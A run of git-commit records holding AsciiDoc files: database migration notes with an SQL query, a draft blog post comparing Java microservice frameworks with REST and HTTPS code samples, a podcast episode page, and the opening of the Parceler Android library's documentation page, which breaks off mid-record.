e1.simple_name AS name1,\n e1.name_id,\n e2.simple_name AS name2,\n e2.name_id,\n tax_syn AS name2_synonym,\n e2.synonyms -> tax_syn ->> 'type' AS type\nFROM tree t,\n tree_version_element tve1\n JOIN tree_element e1 ON tve1.tree_element_id = e1.id\n ,\n tree_version_element tve2\n JOIN tree_element e2 ON tve2.tree_element_id = e2.id\n ,\n jsonb_object_keys(e2.synonyms) AS tax_syn\nWHERE t.name = 'APC'\n AND tve1.tree_version_id = t.current_tree_version_id\n AND tve2.tree_version_id = t.current_tree_version_id\n AND tve2.tree_element_id <> tve1.tree_element_id\n AND e1.excluded = FALSE\n AND e2.excluded = FALSE\n AND e2.synonyms IS NOT NULL\n AND (e2.synonyms -> tax_syn ->> 'name_id') :: BIGINT = e1.name_id\n AND e2.synonyms -> tax_syn ->> 'type' !~ '.*(misapp|pro parte|common).*';\n----\n\nNOTE: we've used the current APC tree above.\n\n== Running the migration\n\nThe services will run a migration script on startup which will alter the DDL adding tables and indexes. It will then\nmigrate all the nodes and versions over as well as setting the family of the names. It will use the preferred host from\nthe mapper to set the links in the tree_element and tree_version_element tables, which means we probably have to manually\ndo this for the moss and lichen shards.\n\nWARNING: *BEFORE you run the services\/upgrade script make sure the preferred host is set correctly if you're running it locally\nor in test.*\n\nAfter the upgrade script has run we need to run the \"tree-element-mapper-links.sql\" script to add all the mapper links.\n\nNOTE: need to delete from notification due to all the changes to name.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"25b27635b7a6173e34cf4b5de64e1bc795d76401","subject":"Update 2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","message":"Update 2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","repos":"cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io,cdelmas\/cdelmas.github.io","old_file":"_posts\/2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","new_file":"_posts\/2015-09-10-A-comparison-of-Microservices-Frameworks.adoc","new_contents":"= A comparison of Microservices Frameworks\n:hp-tags: Tech, Microservices, REST\n\nMicroservice is probably one of the most used term nowadays when speaking about software architecture. Although the underlying concepts aren't new, it is one of the biggest buzzword of the two last years.\n\nTo summarize, big monolithic architectures tend to become not very maintainable and extendable when they grow over a certain size. Moreover, they don't scale well (you scale by multiplying big applications), and you can't replace old parts easily.\n\nOne of the biggest advantages of microservices is to address these concerns: instead of building an entire application as one block, one can build it as a set of services which will communicate over some kind of messaging system (most of the time, REST over HTTP). Given that, you will be able to replace one piece if you need to, you can scale only one piece because you need to, and so on.\n\nBut there is a counterpart: as you're building a distributed system, you will have the disadvantages of a distributed system. Building a distributed system as microservices architecture is not that easy, but fortunately there are many frameworks to help you. This article will present some of them.\n\n\n== Requirements\n\nI don't want to make another comparison based on some \"Hello World\" application. Most of the frameworks provide a simple way to start a server and respond to a simple request with only one line.\n\nBut this is not the real life. In the real life, you should not use plain HTTP. You would use REST \/ HTTPS and have an HTTPS client. You would add a Location header after a successful creation, and add links to your JSON or XML representations. You should have metrics included, to monitor your application. You have some kind of security to protect the access to your API.\n\nHere is a list of what I am going to evaluate.\n\n* I'm about to build a tiny RESTful API. UI is not considered in this article (note that every candidate framework has a mean to serve static resources easily)\n* Only use HTTPS to access the API\n* The API will have two sets of resources (aka two microservices). For simplicity's sake, they will be deployed in the same server, but will communicate over HTTPS.\n* The resource will have a JSON representation\n* Each representation will have at least a self link to the resource\n* After a resource creation, client receive a Location header (the resource's link)\n* The API will be accessible only by people providing a Facebook OAuth token\n* Each API must have a monitoring \/ metrics facility\n* Each service may be packaged as a standalone jar, to be run using `java -jar`.\n* On the performance side, I will measure:\n** request time of POST and GET\n** the startup time of each server (not that important, but interesting)\n** the memory footprint of the application\n* Finally, I will give the final size of the package.\n\n== The candidates\n\nHere is the list of candidates:\n\n* http:\/\/www.dropwizard.io\/[Dropwizard]\n* http:\/\/vertx.io\/[Vertx]\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot]\n* http:\/\/restlet.com\/projects\/restlet-framework\/[Restlet]\n* http:\/\/sparkjava.com\/[Spark] + http:\/\/unirest.io\/java.html[Unirest] (REST client, Spark doesn't provide a REST client itself)\n\nNote that Restlet and Spark doesn't claim to be MicroServices frameworks, but Restlet is known to be a very good REST framework, and Spark is so lightweight that I couldn't resist to try it against bigger frameworks like Spring Boot.\n\n== Prerequisites\n\nEach sample run with a simple `java -jar` command. You will need to set some properties to enable ssl: `-Djavax.net.ssl.trustStore=... -Djavax.net.ssl.trustStorePassword=... -Djavax.net.ssl.keyStorePassword=... -Djavax.net.ssl.keyStorePath=...`.\n\nIn order to be able to run the samples, you need to create a keystore (see http:\/\/www.javacodegeeks.com\/2014\/07\/java-keystore-tutorial.html[this tutorial] for example), and install a self-signed certificate. You will need the Facebook certificate too (see http:\/\/serverfault.com\/questions\/139728\/how-to-download-the-ssl-certificate-from-a-website[here] how to get it), and a user token (see https:\/\/developers.facebook.com\/).\n\nDon't forget to modify the configuration files and system properties accordingly. All these steps are explained in the README file.\n\n== Dropwizard\n\nAs stated by its website, \"`Dropwizard is a Java framework for developing ops-friendly, high-performance, RESTful web services.`\". It is a bundle of some successful libraries such as Jetty, Jersey and Jackson. The documentation is very good, I've found everything I needed inside; a good point, as I hate being forced to search for minutes (hours?) for something said simple.\n\n=== Main\n\nThe main mehod is quite simple: you just build an `Application` instance and run it:\n[source,java]\n----\npublic static void main(String[] args) throws Exception {\n new DropwizardApplication().run(args);\n}\n----\n\nThe `DropwizardApplication` class contains all the plumbing: resource and health checks registration, Guice bootstrapping and Jackson's `ObjectMapper` configuration. It is given an instance of a configuration class (`DropwizardServerConfiguration`) which is a POJO holding the configuration properties read from the YAML file passed as parameter to our application. \n\nThe app is run with parameters: `java -jar app.jar server config.yml`. The `server` parameter is here to tell Dropwizard to start the server, but you can also manipulate the database (I didn't try this).\n\n=== Resources\n\nUnder the hood, Dropwizard uses Jersey, so the resources are just POJOs annotated with (a lot of) JAX-RS annotations:\n\n[source,java]\n----\n@Path(\"\/cars\/{id}\")\n@Produces(MediaType.APPLICATION_JSON)\npublic class CarResource {\n\n @Context\n UriInfo uriInfo;\n\n @Inject\n private CarRepository carRepository;\n\n @GET\n public Response byId(@Auth User user, @PathParam(\"id\") int carId) {\n Optional<Car> car = carRepository.byId(carId);\n return car.map(c -> {\n CarRepresentation carRepresentation = new CarRepresentation(c);\n carRepresentation.addLink(Link.self(uriInfo.getAbsolutePathBuilder().build(c.getId()).toString()));\n return Response.ok(carRepresentation).build();\n }).orElse(Response.status(Response.Status.NOT_FOUND).build());\n }\n}\n----\n\nAll the underlying HTTP handling is done by the framework, you have no mandatory access to request and response objects. In this case, the return is a `Response` but I could simply have returned the object; however, in that case the return code would not be the right one (201), so to have full control over it, I prefer that solution. Moreover, the 404 (Status.NOT_FOUND) is set on the response; I could throw an exception instead, and write a mapper to make an adequate response, but it's overkill (and I hate so-called \"Business Exceptions\").\n\nNote that injection is performed by Guice. It seems that there is a CDI container provided with Jersey (hk2), but I didn't managed to make it work. Linking is handmade, and quite easy with the `UriInfo` object. \n\nDropwizard uses Jackson to serialize \/ deserialize the object returned to JSON, so you have nothing special to do... but you have to configure the `ObjectMapper` to disable errors on unknown properties (see http:\/\/martinfowler.com\/bliki\/TolerantReader.html[Tolerant Reader]).\n\n=== HTTPS\n\nHTTPS is configured in the YAML configuration file; the framework ignores the standard Java properties. The documentation explains exactly how to set it up, and there is no surprise here.\n\n=== REST client\n\nThe REST client is built by Guice, as a singleton; it is not managed as documented, I didn't managed to make it work this way. Otherwise, nothing special about the client, the API is fluent and simple:\n\n[source,java]\n----\n@Override\npublic List<Car> getAllCars(String auth) {\n WebTarget target = client.target(\"https:\/\/localhost:8443\/app\/cars\");\n Invocation invocation = target.request(MediaType.APPLICATION_JSON)\n .header(\"Authorization\", \"Bearer \" + auth)\n .build(HttpMethod.GET);\n Car[] cars = invocation.invoke(Car[].class);\n return asList(cars);\n}\n----\n\nThe `Client`, this time, uses the standard properties.\n\n=== Security\n\nThe authentication requires two things: first, implement the `Authenticator` interface. Note that he single method `authenticate` returns an `Optional<User>`, but not a Java 8's `Optional`, the Guava's one! What a pity... Nevermind. Second, you need to register the authenticator against Jersey:\n\n[source,java]\n----\nenvironment.jersey().register(AuthFactory.binder(\n new OAuthFactory<>(guiceBundle.getInjector().getInstance(FacebookTokenAuthenticator.class),\n getName() + \"-Realm\",\n User.class)));\n----\n\nSo far so good, it works as expected.\n\n=== Monitoring\n\nDropwizard has a built-in monitoring system. You can register healthchecks to ensure that the app is up, and each resource can be metered simply using annotations. You can also add custom metrics, using the metrics registry obtained from the `Environment`.\n\n=== Conclusion\n\nWhile a bit verbose due to all the plumbing involved in the setup, Dropwizard is a nice framework. It provides all the functions needed to build a MicroServices-based application. However, to build tiny services, the amount of plumbing required can be too high compared to the business code; I would not recommend to use it in that case. Otherwise, you cannot go wrong!\n\n\n== Vertx\n\n\"`Vertx is a tool-kit for building reactive applications on the JVM.`\". You can develop with it in Java of course, but also many languages running on the JVM (Javascript, Scala, Ruby, Python, Clojure).\n\nIt also provides an actors-like system, the \"verticles\", which allow deployment of independent, concurrent, and potentially written in different language, services communicating over an event bus. As stated by the documentation, you are not forced to use this model (I didn't in this case, however I will give it a try!).\n\n=== Main\n\nThe framework abstracts low level handling of HTTP, but you need to create the server by hand:\n\n[source,java]\n----\nVertx vertx = Vertx.create();\nHttpServer server = vertx.createHttpServer(serverOptions);\n----\n\nMaybe you noticed the serverOptions parameter (sure you did!). This is the definition:\n\n[source, java]\n----\nHttpServerOptions serverOptions = new HttpServerOptions()\n .setSsl(true)\n .setKeyStoreOptions(new JksOptions()\n .setPath(System.getProperty(\"javax.net.ssl.keyStorePath\"))\n .setPassword(System.getProperty(\"javax.net.ssl.keyStorePassword\")))\n .setPort(8090);\n----\n\nThis object allows to set the port and SSL properties. It doesn't automatically get the standard properties, so you have to do it yourself. Not really a problem.\n\nThe main method creates the HTTP client, set the authentication system and binds \"resources\" to routes.\n\n=== Resources\n\nThere is no resource class in Vertx. You just give handlers to routes:\n\n[source, java]\n----\nCarResource carResource = new CarResource(carRepository);\nrouter.get(\"\/cars\/:id\").produces(\"application\/json\").handler(carResource::byId);\n----\n\n`CarResource` is simply a POJO having a method named `byId` with a `RoutingContext` as parameter:\n\n[source, java]\n----\npublic void byId(RoutingContext routingContext) {\n HttpServerResponse response = routingContext.response();\n String idParam = routingContext.request().getParam(\"id\");\n if (idParam == null) {\n response.setStatusCode(400).end();\n } else {\n Optional<Car> car = carRepository.byId(Integer.parseInt(idParam));\n if (car.isPresent()) {\n CarRepresentation carRepresentation = new CarRepresentation(car.get());\n carRepresentation.addLink(self(routingContext.request().absoluteURI()));\n response.putHeader(\"content-type\", \"application\/json\")\n .end(Json.encode(carRepresentation));\n } else {\n response.setStatusCode(404).end();\n }\n }\n}\n----\n\nAs you can see, you have a total control on the response, and no choice about that. No problem, you know what you do, exactly. The JSON encoding is done by Jackson again, and you still have to disable the \"fail on unknown property\" feature.\n\nOh, by the way, this will not work without a subtle configuration on the route:\n\n[source,java]\n----\nrouter.route(\"\/cars*\").handler(BodyHandler.create());\n----\n\nBy default, Vertx ignores the body, so you have to explicitly say \"I want to read it\". Otherwise, you don't get the body content.\n\nNote that this time, there is no dependency injection, all is done manually. Not a big deal.\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\nTODO...\nIts style is really puzzling at first sight for people like me that are not used to asynchronous programming. But once you get the thing, it's probably one of the best tools I ever used.\n\n== Spring Boot\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== Restlet\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== SparkJava\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n\n...\n\n\/\/\/\/\nToute remarque et aide \u00e0 l'am\u00e9lioration est bienvenue :)\n\/\/\/\/\n\n== A conclusion\nIt's been a long journey. The study is not as complete as I first wanted, but I guess it's a good start.\n\n\nNOTE: TODO blah blah...\n\nAll the code is available on github (give link). You are free and encouraged to fork, play with the code and give feedback.","old_contents":"= A comparison of Microservices Frameworks\n:hp-tags: Tech, Microservices, REST\n\nMicroservice is probably one of the most used term nowadays when speaking about software architecture. Although the underlying concepts aren't new, it is one of the biggest buzzword of the two last years.\n\nTo summarize, big monolithic architectures tend to become not very maintainable and extendable when they grow over a certain size. Moreover, they don't scale well (you scale by multiplying big applications), and you can't replace old parts easily.\n\nOne of the biggest advantages of microservices is to address these concerns: instead of building an entire application as one block, one can build it as a set of services which will communicate over some kind of messaging system (most of the time, REST over HTTP). Given that, you will be able to replace one piece if you need to, you can scale only one piece because you need to, and so on.\n\nBut there is a counterpart: as you're building a distributed system, you will have the disadvantages of a distributed system. Building a distributed system as microservices architecture is not that easy, but fortunately there are many frameworks to help you. This article will present some of them.\n\n\n== Requirements\n\nI don't want to make another comparison based on some \"Hello World\" application. Most of the frameworks provide a simple way to start a server and respond to a simple request with only one line.\n\nBut this is not the real life. In the real life, you should not use plain HTTP. You would use REST \/ HTTPS and have an HTTPS client. You would add a Location header after a successful creation, and add links to your JSON or XML representations. You should have metrics included, to monitor your application. You have some kind of security to protect the access to your API.\n\nHere is a list of what I am going to evaluate.\n\n* I'm about to build a tiny RESTful API. UI is not considered in this article (note that every candidate framework has a mean to serve static resources easily)\n* Only use HTTPS to access the API\n* The API will have two sets of resources (aka two microservices). For simplicity's sake, they will be deployed in the same server, but will communicate over HTTPS.\n* The resource will have a JSON representation\n* Each representation will have at least a self link to the resource\n* After a resource creation, client receive a Location header (the resource's link)\n* The API will be accessible only by people providing a Facebook OAuth token\n* Each API must have a monitoring \/ metrics facility\n* Each service may be packaged as a standalone jar, to be run using `java -jar`.\n* On the performance side, I will measure:\n** request time of POST and GET\n** the startup time of each server (not that important, but interesting)\n** the memory footprint of the application\n* Finally, I will give the final size of the package.\n\n== The candidates\n\nHere is the list of candidates:\n\n* http:\/\/www.dropwizard.io\/[Dropwizard]\n* http:\/\/vertx.io\/[Vertx]\n* http:\/\/projects.spring.io\/spring-boot\/[Spring Boot]\n* http:\/\/restlet.com\/projects\/restlet-framework\/[Restlet]\n* http:\/\/sparkjava.com\/[Spark] + http:\/\/unirest.io\/java.html[Unirest] (REST client, Spark doesn't provide a REST client itself)\n\nNote that Restlet and Spark doesn't claim to be MicroServices frameworks, but Restlet is known to be a very good REST framework, and Spark is so lightweight that I couldn't resist to try it against bigger frameworks like Spring Boot.\n\n== Prerequisites\n\nEach sample run with a simple `java -jar` command. You will need to set some properties to enable ssl: `-Djavax.net.ssl.trustStore=... -Djavax.net.ssl.trustStorePassword=... -Djavax.net.ssl.keyStorePassword=... -Djavax.net.ssl.keyStorePath=...`.\n\nIn order to be able to run the samples, you need to create a keystore (see http:\/\/www.javacodegeeks.com\/2014\/07\/java-keystore-tutorial.html[this tutorial] for example), and install a self-signed certificate. You will need the Facebook certificate too (see http:\/\/serverfault.com\/questions\/139728\/how-to-download-the-ssl-certificate-from-a-website[here] how to get it), and a user token (see https:\/\/developers.facebook.com\/).\n\nDon't forget to modify the configuration files and system properties accordingly. All these steps are explained in the README file.\n\n== Dropwizard\n\nAs stated by its website, \"`Dropwizard is a Java framework for developing ops-friendly, high-performance, RESTful web services.`\". It is a bundle of some successful libraries such as Jetty, Jersey and Jackson. The documentation is very good, I've found everything I needed inside; a good point, as I hate being forced to search for minutes (hours?) for something said simple.\n\n=== Main\n\nThe main mehod is quite simple: you just build an `Application` instance and run it:\n[source,java]\n----\npublic static void main(String[] args) throws Exception {\n new DropwizardApplication().run(args);\n}\n----\n\nThe `DropwizardApplication` class contains all the plumbing: resource and health checks registration, Guice bootstrapping and Jackson's `ObjectMapper` configuration. It is given an instance of a configuration class (`DropwizardServerConfiguration`) which is a POJO holding the configuration properties read from the YAML file passed as parameter to our application. \n\nThe app is run with parameters: `java -jar app.jar server config.yml`. The `server` parameter is here to tell Dropwizard to start the server, but you can also manipulate the database (I didn't try this).\n\n=== Resources\n\nUnder the hood, Dropwizard uses Jersey, so the resources are just POJOs annotated with (a lot of) JAX-RS annotations:\n\n[source,java]\n----\n@Path(\"\/cars\/{id}\")\n@Produces(MediaType.APPLICATION_JSON)\npublic class CarResource {\n\n @Context\n UriInfo uriInfo;\n\n @Inject\n private CarRepository carRepository;\n\n @GET\n public Response byId(@Auth User user, @PathParam(\"id\") int carId) {\n Optional<Car> car = carRepository.byId(carId);\n return car.map(c -> {\n CarRepresentation carRepresentation = new CarRepresentation(c);\n carRepresentation.addLink(Link.self(uriInfo.getAbsolutePathBuilder().build(c.getId()).toString()));\n return Response.ok(carRepresentation).build();\n }).orElse(Response.status(Response.Status.NOT_FOUND).build());\n }\n}\n----\n\nAll the underlying HTTP handling is done by the framework, you have no mandatory access to request and response objects. In this case, the return is a `Response` but I could simply have returned the object; however, in that case the return code would not be the right one (201), so to have full control over it, I prefer that solution. Moreover, the 404 (Status.NOT_FOUND) is set on the response; I could throw an exception instead, and write a mapper to make an adequate response, but it's overkill (and I hate so-called \"Business Exceptions\").\n\nNote that injection is performed by Guice. It seems that there is a CDI container provided with Jersey (hk2), but I didn't managed to make it work. Linking is handmade, and quite easy with the `UriInfo` object. \n\nDropwizard uses Jackson to serialize \/ deserialize the object returned to JSON, so you have nothing special to do... but you have to configure the `ObjectMapper` to disable errors on unknown properties (see http:\/\/martinfowler.com\/bliki\/TolerantReader.html[Tolerant Reader]).\n\n=== HTTPS\n\nHTTPS is configured in the YAML configuration file; the framework ignores the standard Java properties. The documentation explains exactly how to set it up, and there is no surprise here.\n\n=== REST client\n\nThe REST client is built by Guice, as a singleton; it is not managed as documented, I didn't managed to make it work this way. Otherwise, nothing special about the client, the API is fluent and simple:\n\n[source,java]\n----\n@Override\npublic List<Car> getAllCars(String auth) {\n WebTarget target = client.target(\"https:\/\/localhost:8443\/app\/cars\");\n Invocation invocation = target.request(MediaType.APPLICATION_JSON)\n .header(\"Authorization\", \"Bearer \" + auth)\n .build(HttpMethod.GET);\n Car[] cars = invocation.invoke(Car[].class);\n return asList(cars);\n}\n----\n\nThe `Client`, this time, uses the standard properties.\n\n=== Security\n\nThe authentication requires two things: first, implement the `Authenticator` interface. Note that he single method `authenticate` returns an `Optional<User>`, but not a Java 8's `Optional`, the Guava's one! What a pity... Nevermind. Second, you need to register the authenticator against Jersey:\n\n[source,java]\n----\nenvironment.jersey().register(AuthFactory.binder(\n new OAuthFactory<>(guiceBundle.getInjector().getInstance(FacebookTokenAuthenticator.class),\n getName() + \"-Realm\",\n User.class)));\n----\n\nSo far so good, it works as expected.\n\n=== Monitoring\n\nDropwizard has a built-in monitoring system. You can register healthchecks to ensure that the app is up, and each resource can be metered simply using annotations. You can also add custom metrics, using the metrics registry obtained from the `Environment`.\n\n=== Conclusion\n\nWhile a bit verbose due to all the plumbing involved in the setup, Dropwizard is a nice framework. It provides all the functions needed to build a MicroServices-based application. However, to build tiny services, the amount of plumbing required can be too high compared to the business code; I would not recommend to use it in that case. Otherwise, you cannot go wrong!\n\n\n== Vertx\n\n\"`Vertx is a tool-kit for building reactive applications on the JVM.`\". You can develop with it in Java of course, but also many languages running on the JVM (Javascript, Scala, Ruby, Python, Clojure).\n\nIt also provides an actors-like system, the \"verticles\", which allow deployment of independent, concurrent, and potentially written in different language, services communicating over an event bus. As stated by the documentation, you are not forced to use this model (I didn't in this case, however I will give it a try!).\n\n=== Main\n\nThe framework abstracts low level handling of HTTP, but you need to create the server by hand:\n\n[source,java]\n----\nVertx vertx = Vertx.create();\nHttpServer server = vertx.createHttpServer(serverOptions);\n----\n\nMaybe you noticed the serverOptions parameter (sure you did!). This is the definition:\n\n[source, java]\n----\nHttpServerOptions serverOptions = new HttpServerOptions()\n .setSsl(true)\n .setKeyStoreOptions(new JksOptions()\n .setPath(System.getProperty(\"javax.net.ssl.keyStorePath\"))\n .setPassword(System.getProperty(\"javax.net.ssl.keyStorePassword\")))\n .setPort(8090);\n----\n\nThis object allows to set the port and SSL properties. It doesn't automatically get the standard properties, so you have to do it yourself. Not really a problem.\n\nThe main method creates the HTTP client, set the authentication system and binds \"resources\" to routes.\n\n=== Resources\n\nThere is no resource class in Vertx. You just give handlers to routes:\n\n[source, java]\n----\nCarResource carResource = new CarResource(carRepository);\nrouter.get(\"\/cars\/:id\").produces(\"application\/json\").handler(carResource::byId);\n----\n\n`CarResource` is simply a POJO having a method named `byId` with a `RoutingContext` as parameter:\n\n[source, java]\n----\npublic void byId(RoutingContext routingContext) {\n HttpServerResponse response = routingContext.response();\n String idParam = routingContext.request().getParam(\"id\");\n if (idParam == null) {\n response.setStatusCode(400).end();\n } else {\n Optional<Car> car = carRepository.byId(Integer.parseInt(idParam));\n if (car.isPresent()) {\n CarRepresentation carRepresentation = new CarRepresentation(car.get());\n carRepresentation.addLink(self(routingContext.request().absoluteURI()));\n response.putHeader(\"content-type\", \"application\/json\")\n .end(Json.encode(carRepresentation));\n } else {\n response.setStatusCode(404).end();\n }\n }\n}\n----\n\nNote that this time, there is no dependency injection, all is done manually. Not a big deal.\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\nTODO...\nIts style is really puzzling at first sight for people like me that are not used to asynchronous programming. But once you get the thing, it's probably one of the best tools I ever used.\n\n== Spring Boot\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== Restlet\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n== SparkJava\n\n=== Main\n\n=== Resources\n\n=== HTTPS\n\n=== REST Client\n\n=== Security\n\n=== Monitoring\n\n=== Conclusion\n\n\n...\n\n\/\/\/\/\nToute remarque et aide \u00e0 l'am\u00e9lioration est bienvenue :)\n\/\/\/\/\n\n== A conclusion\nIt's been a long journey. The study is not as complete as I first wanted, but I guess it's a good start.\n\n\nNOTE: TODO blah blah...\n\nAll the code is available on github (give link). You are free and encouraged to fork, play with the code and give feedback.","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"f49c5e4da1a03307aae234830e5c380ea5cf93a9","subject":"Update 2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","message":"Update 2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","new_file":"_posts\/2015-11-11-Episode-30-38-Weeks-Old-Next-week-Brains.adoc","new_contents":"= Episode 30: 38 Weeks Old. Next week: Brains\n:hp-tags: UI, Mac, TotM, TotW, Beta, PC, Zen\n:hp-image: logo.png\n:published_at: 2015-11-11\n\nIt has been thirty-eight weeks since Chris kicked off this little thing called Table of the Month (TotM)!\n\nWe talk about some challenges with running the TotM\/TotW and the results from the last tourney.\n\nThere\u2019s new UI blah, Jared goes to the dark side and tests out TPA on Steam Mac, and we talk about Evil Week and Halloween in Aussie.\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/38-weeks-old-next-week-brains-13658[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/blab.im\/BlahCade[Blab.im Live Session]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Intro\n* Greetings and Salutations - 0:45\n* TotM Admin Challenges - 3:50\n* TotM Results - 8:00\n* TotW - 9:50\n* New UI PC Beta Hands-on - 14:55\n* Android User Guide 2.0? - 21:35\n* Jared Tries out TPA for Steam Mac - 23:50\n* Insurance Day On Set - 27:00\n* Evil Week - 31:35\n* Halloween in Aussie - 39:50\n* New PTX Album - 44:00\n* Interview Plans and Tshirts - 44:45\n* Penny for your Thoughts? - 46:00\n* Sponsors and Outro - 47:00\n","old_contents":"= Episode 29: 38 Weeks Old. Next week: Brains\n:hp-tags: UI, Mac, TotM, TotW, Beta, PC, Zen\n:hp-image: logo.png\n:published_at: 2015-11-11\n\nIt has been thirty-eight weeks since Chris kicked off this little thing called Table of the Month (TotM)!\n\nWe talk about some challenges with running the TotM\/TotW and the results from the last tourney.\n\nThere\u2019s new UI blah, Jared goes to the dark side and tests out TPA on Steam Mac, and we talk about Evil Week and Halloween in Aussie.\n\n== Links\n\nhttp:\/\/shoutengine.com\/BlahCadePodcast\/38-weeks-old-next-week-brains-13658[Stream\/Download\/RSS]\n\nhttps:\/\/itunes.apple.com\/us\/podcast\/blahcade-podcast\/id1039748922?mt=2[iTunes]\n\nhttps:\/\/blab.im\/BlahCade[Blab.im Live Session]\n\nhttps:\/\/represent.com\/blahcade-shirt[BlahCade T-shirts on represent.com]\n\n== Timings\n\n* Intro\n* Greetings and Salutations - 0:45\n* TotM Admin Challenges - 3:50\n* TotM Results - 8:00\n* TotW - 9:50\n* New UI PC Beta Hands-on - 14:55\n* Android User Guide 2.0? - 21:35\n* Jared Tries out TPA for Steam Mac - 23:50\n* Insurance Day On Set - 27:00\n* Evil Week - 31:35\n* Halloween in Aussie - 39:50\n* New PTX Album - 44:00\n* Interview Plans and Tshirts - 44:45\n* Penny for your Thoughts? - 46:00\n* Sponsors and Outro - 47:00\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"ad2c1cada0cc5fe377f2b4180625ba6974e153f4","subject":"Touched up ActivityStarter link","message":"Touched up ActivityStarter link\n","repos":"johncarl81\/parceler-site,johncarl81\/parceler-site,johncarl81\/parceler-site","old_file":"index.adoc","new_file":"index.adoc","new_contents":"---\nlayout: default\ntitle: Parceler\ndocumentationExpanded: false\npostsExpanded: false\n---\n\nHave a question? http:\/\/stackoverflow.com\/questions\/ask?tags=parceler[Ask it on StackOverflow.]\n\nFound an issue? https:\/\/github.com\/johncarl81\/parceler\/issues\/new[Please report it.]\n\nimage:https:\/\/badges.gitter.im\/johncarl81\/parceler.svg[link=\"https:\/\/gitter.im\/johncarl81\/parceler?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge\"]\n\n=== Introduction\n\nIn Android, http:\/\/developer.android.com\/reference\/android\/os\/Parcelable.html[Parcelables] are a great way to serialize Java Objects between Contexts.\nhttp:\/\/www.developerphil.com\/parcelable-vs-serializable\/[Compared] with traditional Serialization, Parcelables take on the order of 10x less time to both serialize and deserialize.\nThere is a major flaw with Parcelables, however.\nParcelables contain a ton of boilerplate code.\nTo implement a Parcelable, you must mirror the `writeToParcel()` and `createFromParcel()` methods such that they read and write to the Parcel in the same order.\nAlso, a Parcelable must define a `public static final Parcelable.Creator CREATOR` in order for the Android infrastructure to be able to leverage the serialization code.\n\nParceler is a code generation library that generates the Android Parcelable boilerplate source code.\nNo longer do you have to implement the Parcelable interface, the `writeToParcel()` or `createFromParcel()` or the `public static final CREATOR`.\nYou simply annotate a POJO with `@Parcel` and Parceler does the rest.\nBecause Parceler uses the Java JSR-269 Annotation Processor, there is no need to run a tool manually to generate the Parcelable code.\nJust annotate your Java Bean, compile and you are finished.\nBy default, Parceler will serialize the fields of your instance directly:\n\n[source,java]\n----\n@Parcel\npublic class Example {\n String name;\n int age;\n\n public Example() {}\n\n public Example(int age, String name) {\n this.age = age;\n this.name = name;\n }\n\n public String getName() { return name; }\n\n public int getAge() { return age; }\n}\n----\n\nBe careful not to use private fields when using the default field serialization strategy as it will incur a performance penalty due to reflection.\n\nTo use the generated code, you may reference the generated class directly, or via the `Parcels` utility class:\n\n[source,java]\n----\nParcelable wrapped = Parcels.wrap(new Example(\"Andy\", 42));\n----\n\nTo dereference the `@Parcel`, just call the `Parcels.unwrap()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(wrapped);\nexample.getName(); \/\/ Andy\nexample.getAge(); \/\/ 42\n----\n\nOf course, the wrapped `Parcelable` can be added to an Android Bundle to transfer from Activity to Activity:\n\n[source,java]\n----\nBundle bundle = new Bundle();\nbundle.putParcelable(\"example\", Parcels.wrap(example));\n----\n\nAnd dereferenced in the `onCreate()` method:\n\n[source,java]\n----\nExample example = Parcels.unwrap(getIntent().getParcelableExtra(\"example\"));\n----\n\nThis wrapping and unwrapping technique plays well with the Intent Factory pattern.\nIn addition, Parceler is supported by the following libraries:\n\n * http:\/\/androidtransfuse.org\/documentation.html#parcel[Transfuse] - Allows `@Parcel` annotated beans to be used with the `@Extra` injection.\n * https:\/\/github.com\/sockeqwe\/fragmentargs#argsbundler[FragmentArgs] - Uses the `ParcelerArgsBundler` adapter to wrap and unwrap `@Parcel` annotated beans with fragment parameters.\n * https:\/\/github.com\/f2prateek\/dart[Dart] - Autodetects `@Parcel` annotated beans and automatically unwraps them when using `@InjectExtra`.\n * http:\/\/androidannotations.org\/[AndroidAnnotations] - Autodetects `@Parcel` annotated beans and https:\/\/github.com\/excilys\/androidannotations\/wiki\/ParcelerIntegration[automatically wraps\/unwraps] them when using `@Extra`, `@FragmentArg`, `@InstanceState` and other `Bundle` related annotations.\n * https:\/\/github.com\/MarcinMoskala\/ActivityStarter\/wiki\/Parceler-Arg-Converter-usage[ActivityStarter] - Uses `ParcelarArgConverter` to allow use Parceler objects as arguments passed to Activities, Fragments, Services, etc.\n\n=== 